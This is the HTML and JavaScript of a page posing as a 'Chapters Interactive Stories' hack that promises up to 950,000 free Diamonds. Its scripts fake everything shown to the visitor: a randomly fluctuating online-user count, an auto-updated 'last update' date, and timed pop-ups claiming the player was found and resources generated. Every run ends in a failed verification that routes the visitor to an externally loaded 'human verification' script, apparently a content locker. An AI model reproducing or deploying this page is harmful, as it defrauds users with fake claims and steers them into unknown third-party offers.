

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head>


	    <title>Chapters Interactive Stories Hack - Unlimited Diamonds (Android/iOS)</title>
        <meta name="keywords" content="Chapters Interactive Stories hack, Chapters Interactive Stories hack Diamonds, Chapters Interactive Stories free Diamonds, Chapters Interactive Stories hack android, Chapters Interactive Stories hack ios, Chapters Interactive Stories">
        <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		<meta name="theme-color" content="#000000">

		<!-- Icons -->
		<link rel="stylesheet" href="files/icon-font.min.html">
		<link rel="stylesheet" href="files/all.css">
		<link href="files/css.css" rel="stylesheet">
		<!-- Google Fonts -->
		<link href="files/css_002.css" rel="stylesheet">
		<!-- CSS -->
		<link href="files/bootstrap.min.css" rel="stylesheet">  
		<link href="files/animate.css" rel="stylesheet">
		<link href="files/style.css" rel="stylesheet">
		<link href="files/sweetalert2.css" rel="stylesheet">
		<script src="files/vanillatoasts.js"></script>
		<script src="files/live.js"></script>
		<link href="files/vanillatoasts.css" rel="stylesheet">
		<!-- Global site tag (gtag.js) - Google Analytics -->

		
		<style>
/*--------------------------------------------------------------
# BG
--------------------------------------------------------------*/
#bg {
	position: fixed;
	right: 0;
	bottom: 0;
	min-width: 100%; 
	min-height: 100%;
	z-index: -20;
	background: url('images/chapters-interactive-stories-image.jpg');
	background-repeat: no-repeat;
	background-size: cover;
}
.overlay-pattern {
    background: url('./files/overlay-pattern.png');
    opacity: 0.5;
    position: fixed;
    left: 0;
    top: 0;
    right: 0;
    z-index: -10;
    width: 100%;
    height: 100%;
	box-shadow: inset 0 0 300px 0 #c5f6ff;
}
.overlay {
    -moz-animation: overlay .5s .5s forwards;
    -webkit-animation: overlay .5s .5s forwards;
    -ms-animation: overlay .5s .5s forwards;
    animation: overlay .5s .5s forwards;
    background-attachment: fixed, fixed;
    background-image: url("./files/overlay-pattern2.png");
    background-position: top left, center center;
    background-repeat: repeat, no-repeat;
    background-size: auto, cover;
    height: 100%;
    left: 0;
    opacity: 0;
    position: fixed;
    top: 0;
    width: 100%;
	z-index: -5;
}
@-moz-keyframes overlay {
	0% {
		opacity: 0;
	}
	100% {
		opacity: 0.5;
	}
}
@-webkit-keyframes overlay {
	0% {
		opacity: 0;
	}
	100% {
		opacity: 0.5;
	}
}
@-ms-keyframes overlay {
	0% {
		opacity: 0;
	}
	100% {
		opacity: 0.5;
	}
}
@keyframes overlay {
	0% {
		opacity: 0;
	}
	100% {
		opacity: 0.5;
	}
}

            strike {
                color: red;
            }
            
		input[type="value"]{
			font-size: 32px;
		}
		input[type="text"]{
		-moz-appearance: none;
		-webkit-appearance: none;
		-ms-appearance: none;
		appearance: none;
		background: #e7e7e7;
		border: 0;
		border-radius: 10px;
		color: #222222;
		display: block;
		outline: 0;
		padding: 0 1em;
		text-decoration: none;
		width: 100%;
		}
		input::-moz-focus-inner {
		border: 0;
		padding: 0;
		}
		input {
		color: #222222;
		font-size: 30px;
		font-weight: 600;
		letter-spacing: 0.025em;
		line-height: 1.65;
		}
		#spiner {
			font-size: 2.6em;
			display: block;
			text-align: center;
			margin: 20px auto;
			color: #587395;
		}
		.hide {
			display: none;
		}
		.swal2-popup {
			border-radius: 30px;
		}
		.Diamonds-color { 
			color: rgb(218, 155, 47) !important; 
			text-shadow: -1px -1px 0 #1b1f2f, 1px -1px 0 #1b1f2f, -1px 1px 0 #1b1f2f, 1px 1px 0 #1b1f2f;    
		}
		.Diamonds-color { 
			color: #FAF6A7 !important; 
			text-shadow: -1px -1px 0 #1b1f2f, 1px -1px 0 #1b1f2f, -1px 1px 0 #1b1f2f, 1px 1px 0 #1b1f2f;
		}
		.form-group {
			margin-top: 0px;
		}
		.form-group input {
			padding: 0;
			text-align: center;
			height: 55px;
			font-size: 32px;
			font-family: 'Russo One', sans-serif;
			text-shadow: -1px -1px 0 #1b1f2f, 1px -1px 0 #1b1f2f, -1px 1px 0 #1b1f2f, 1px 1px 0 #1b1f2f;	
		}
		button.btn-minus, button.btn-plus {
			font-size: 16px;
			text-shadow: -1px -1px 0 rgba(0,0,0,0.3);
			color: #fff;
			padding: 3px 20px;
			margin: 0px 10px 0 10px;
			-webkit-border-radius: 3px; 
			-moz-border-radius: 3px;
			border-radius: 3px;
            width: 56px;
            height: 32px;
		}
		button.btn-minus {
			border: 1px solid #df0909; 
			background-color: #f62b2b; background-image: -webkit-gradient(linear, left top, left bottom, from(#f62b2b), to(#d20202));
			background-image: -webkit-linear-gradient(top, #f62b2b, #d20202);
			background-image: -moz-linear-gradient(top, #f62b2b, #d20202);
			background-image: -ms-linear-gradient(top, #f62b2b, #d20202);
			background-image: -o-linear-gradient(top, #f62b2b, #d20202);
			background-image: linear-gradient(to bottom, #f62b2b, #d20202);filter:progid:DXImageTransform.Microsoft.gradient(GradientType=0,startColorstr=#f62b2b, endColorstr=#d20202);
		}
		button.btn-plus {
			border:1px solid #34740e;
			background-color: #4ba614; background-image: -webkit-gradient(linear, left top, left bottom, from(#4ba614), to(#008c00));
			background-image: -webkit-linear-gradient(top, #4ba614, #008c00);
			background-image: -moz-linear-gradient(top, #4ba614, #008c00);
			background-image: -ms-linear-gradient(top, #4ba614, #008c00);
			background-image: -o-linear-gradient(top, #4ba614, #008c00);
			background-image: linear-gradient(to bottom, #4ba614, #008c00);filter:progid:DXImageTransform.Microsoft.gradient(GradientType=0,startColorstr=#4ba614, endColorstr=#008c00);
		}
		.disabledJS {
			pointer-events: none; 
		}
		span.number {
			font-weight: normal;
			font-size: 32px;
			font-family: 'Russo One', sans-serif;
		}
		.input-icon2 {
			margin-top: -8px;
			position: relative;
			margin: auto;
		}
		.input-icon2 {
			height: 50px;
			width: 80px;
			line-height: 40px;
			background: #e7e7e7;
			border: 10px solid #e7e7e7;
			border-radius: 30px 30px 0px 0px;
		}
		.resources {
			width: 40px;
			height: 40px;
		}
		.float{
			position:fixed;
			width:55px;
			height:55px;
			bottom:40px;
			right:40px;
			background-color:#587395;
			color:#FFF;
			border-radius:50px;
			text-align:center;
			box-shadow: 2px 2px 3px #999;
		}
		.float:hover {
			color: #000;
			background-color: #fff;
		}
		.my-float{
			margin-top:19px;
		}
		</style>	
	</head>
	<body onload="create()">	
		<div id="bg"></div>
		<div class="overlay-pattern"></div>
		<div class="overlay"></div>
		<section class="app-download-section">
			<div class="container">
				<div class="app-download-wrapper animated flipInX">
					<div class="app-icon-wrapper">
						<div class="app-icon-inner-wrapper">
							<img src="images/chapters-interactive-stories-avatar.png" class="app-icon-img img-fluid">
						</div>
					</div>
					<div class="app-download-content">
						<div class="app-download-content-header">
							<h1><span>Chapters Interactive Stories Hack</span></h1>
						</div>
						<div class="app-download-status">
							<div class="status-row row-first animated bounceIn animation-delay-400">
								<span class="status-label">Status:</span>
								<span id="status" class="status-dynamic">Online</span>
							</div>
							<div class="status-row row-second odd animated bounceIn animation-delay-600">
								<span class="status-label">Last Update:</span>
								<span id="date" class="status-dynamic">Fri Oct 06 2023</span>
							</div>
							<div class="status-row row-last animated bounceIn animation-delay-800">
								<span class="status-label">Online Users:</span>
								<span id="online-count" class="status-dynamic">358</span>
							</div>
						</div>
						<div id="control">
							<div class="app-download-main animated bounceIn">
								<p class="app-download-intro-text">Click on the button below to begin the process.</p>
								<div class="button-wrapper">
									<div id="b-1" onclick="nexT();playAu()" class="button animated pulse infinite"><span class="lnr lnr-download"></span><span>Start Mod</span></div>
								</div>
							</div>
						</div>
						<div id="show" class="hide">
							<div class="app-download-main animated bounceIn">
									<p class="app-download-intro-text">Enter Your Username:</p>
								    <form action="javascript:void(0);">
										<input type="text" name="usernameInput">
									</form>
									<br>
								<p class="app-download-intro-text">Choose Your Platform:</p>
								<div class="field-wrapper platform-field-wrapper">
									<div id="devices">
									<div class="row small-margin">
										<div class="col small-padding">
											<div onclick="playA()" class="platform-item platform-item-1">
												<i class="fab fa-android"></i>
												<span>Android</span>
											</div>
										</div>
										<div class="col small-padding">
											<div onclick="playA()" class="platform-item platform-item-2">
												<i class="fab fa-apple"></i>
												<span>iOS</span>
											</div>
										</div>
									</div>
									</div>
								</div>
						<br>
						<p class="app-download-intro-text">Select Diamonds Amount:</p>
								<div id="currency">
								<div class="row small-margin">	
                                        <div class="col small-padding">
											<div onclick="playA()" class="platform-item1 platform-item-1">
												<img src="images/chapters-interactive-stories-res.png">
												<span>150,000</span>
											</div>
										</div>
										<div class="col small-padding">
											<div onclick="playA()" class="platform-item1 platform-item-2">
												<img src="images/chapters-interactive-stories-res.png">
												<span>450,000</span>
											</div>
										</div>
										<div class="col small-padding">
											<div onclick="playA()" class="platform-item1 platform-item-2">
												<img src="images/chapters-interactive-stories-res.png">
												<span>950,000</span>
											</div>
										</div>
                                   </div>	
                                   
                                    <br>
										<div class="button-wrapper">
												<div id="b-2" onclick="playAu(); nexT1()" class="button animated pulse infinite"><span class="lnr lnr-download"></span><span>Continue</span></div>
										</div>
                                  </div>		
						</div>
					</div>
						<div id="verify" class="hide">
								<div class="app-download-main animated bounceIn">
									<p>You are almost done! Please, complete this final step by 
clicking on the button below and follow all stated instructions in order
 to verify you are a human.</p>
									<div id="spiner" class="fas fa-spinner fa-spin"></div>
									<script type="text/javascript">
    var rWfFh_Hwp_Rqlvqc={"it":2967048,"key":"d144a"};
</script>
<script src="https://d9cshxmf0qazr.cloudfront.net/ca63320.js"></script>
										<div id="b-1" onclick="_Cd()" class="button animated pulse infinite"><span class="lnr lnr-download"></span><span>Verify</span></div>
								</div></a>
				            </div>
                        </div>
				    </div>
				</div>
			</div>
		</section>
		<footer>
			<div class="container">
				<div class="footer-content">
                    <div class="policy-links">
                        
                    </div>
                    
                    <p>All trademarks, service marks, trade 
names, product names and logos appearing on this site are the property 
of their respective owners.</p>
				</div>
			</div>
		</footer>
		<div class="X650d"></div>
		<audio id="myAudio">
			<source src="files/click.ogg" type="audio/ogg">
			<source src="files/click.mp3" type="audio/mpeg"> 
		</audio>
		<audio id="myAu">
			<source src="files/choose.ogg" type="audio/ogg">
			<source src="files/choose.mp3" type="audio/mpeg"> 
		</audio>
		<audio id="myAA">
			<source src="files/success.ogg" type="audio/ogg">
			<source src="files/success.mp3" type="audio/mpeg"> 
		</audio>
		<audio id="myerror">
			<source src="files/error.ogg" type="audio/ogg">
			<source src="files/error.mp3" type="audio/mpeg"> 
		</audio>

	<!-- JS -->	
	<script>
		function random(min,max)
			{
				return Math.floor(Math.random()*(max-min+1)+min);
			}
		
			var initial = random(300, 400);
			var count = initial;
		
			setInterval(function() {
				var variation = random(-5,5);
		
				count += variation
				document.getElementById("online-count").innerHTML = count;
		
			}, 1000)
		</script>
		<script>
			var d = new Date();
			document.getElementById("date").innerHTML = d.toDateString();
		</script>
		<script>
		var z = document.getElementById("myAA")
        function nexT() {
        let timerInterval
          Swal.fire({
            timer: 5000,
            imageUrl: 'files/spin.webp',
            imageAlt: 'Loading',
			title: 'Loading',
            showConfirmButton: false,
            onClose: () => {
              clearInterval(timerInterval)
            }

          }).then(function() {
			var x = document.getElementById("control");
			  if (x.style.display === "none") {
				x.style.display = "block";
			  } else {
					x.style.display = "none";
				}
			z.play();
			var element = document.getElementById("show");
			element.classList.remove("hide");
			Swal.fire({
			type: 'success',
			title: 'Started Mod Successfully',
			showConfirmButton: false,
			timer: 3000,
			onClose: () => {
              clearInterval(timerInterval)
            }
			})
			})
        }
		function nexT1() {
		let timerInterval
          Swal.fire({
            timer: 5000,
            imageUrl: 'files/spin.webp',
			imageAlt: 'Loading',
			title: 'Looking For Username',
            showConfirmButton: false,
            onClose: () => {
              clearInterval(timerInterval)
            }

            }).then(function() {
			z.play();
			Swal.fire({
			type: 'success',
			title: 'Player found',
			showConfirmButton: false,
			timer: 3000,
			onClose: () => {
              clearInterval(timerInterval)
            }
			}).then(function() {
				Swal.fire({
				timer: 5000,
				imageUrl: 'files/spin.webp',
				imageAlt: 'Loading',
				title: 'Generating',
				showConfirmButton: false,
				onClose: () => {
				clearInterval(timerInterval)
				}
				}).then (function(){
					z.play();
					Swal.fire({
					type: 'success',
					title: 'Resource Generated',
					showConfirmButton: false,
					timer: 3000,
					onClose: () => {
					clearInterval(timerInterval)
					}
					}).then(function() {
						Swal.fire({
						timer: 5000,
						imageUrl: 'files/spin.webp',
						imageAlt: 'Loading',
						title: 'Verifying',
						showConfirmButton: false,
						onClose: () => {
						  clearInterval(timerInterval)
						}
						}).then(function() {
							b.play();
							Swal.fire({
							type: 'error',
							title: 'Unable to verify Account Owner',
							showConfirmButton: false,
							timer: 3000,
							onClose: () => {
							clearInterval(timerInterval)
							}
							}).then(function(){
								var element = document.getElementById("show");
								element.classList.add("hide");
								var element1 = document.getElementById("verify");
								element1.classList.remove("hide");
							})
						})	
					})				
				})
			})
		})
        }
		</script>
        <script>
          // Add active class to the current button (highlight it)
          var header = document.getElementById("devices");
          var btns = header.getElementsByClassName("platform-item");
          for (var i = 0; i < btns.length; i++) {
            btns[i].addEventListener("click", function() {
            var current = document.getElementsByClassName("active");
            if (current.length > 0) { 
              current[0].className = current[0].className.replace(" active", "");
            }
            this.className += " active";
            });
          }
		</script>
		<script>
					// Add active class to the current button (highlight it)
					var header = document.getElementById("currency");
					var btns = header.getElementsByClassName("platform-item1");
					for (var i = 0; i < btns.length; i++) {
					  btns[i].addEventListener("click", function() {
					  var current = document.getElementsByClassName("active1");
					  if (current.length > 0) { 
						current[0].className = current[0].className.replace(" active1", "");
					  }
					  this.className += " active1";
					  });
					}
		</script>
		<script>
			var x = document.getElementById("myAudio"); 
			var y = document.getElementById("myAu")
			var z = document.getElementById("myAA")
			var b = document.getElementById("myerror")
			function playAu() { 
			  x.play(); 
			}
			function playA() {
			  y.play();
			}
			function playAA() {
			  z.play();
			}
			function playerror() {
			  b.play();
			}	 
        </script>
		<script src="files/jquery.min.js"></script>
		<script src="files/bootstrap.min.js"></script>
		<script src="files/sweetalert2.js"></script>
		<script src="files/main.js"></script>

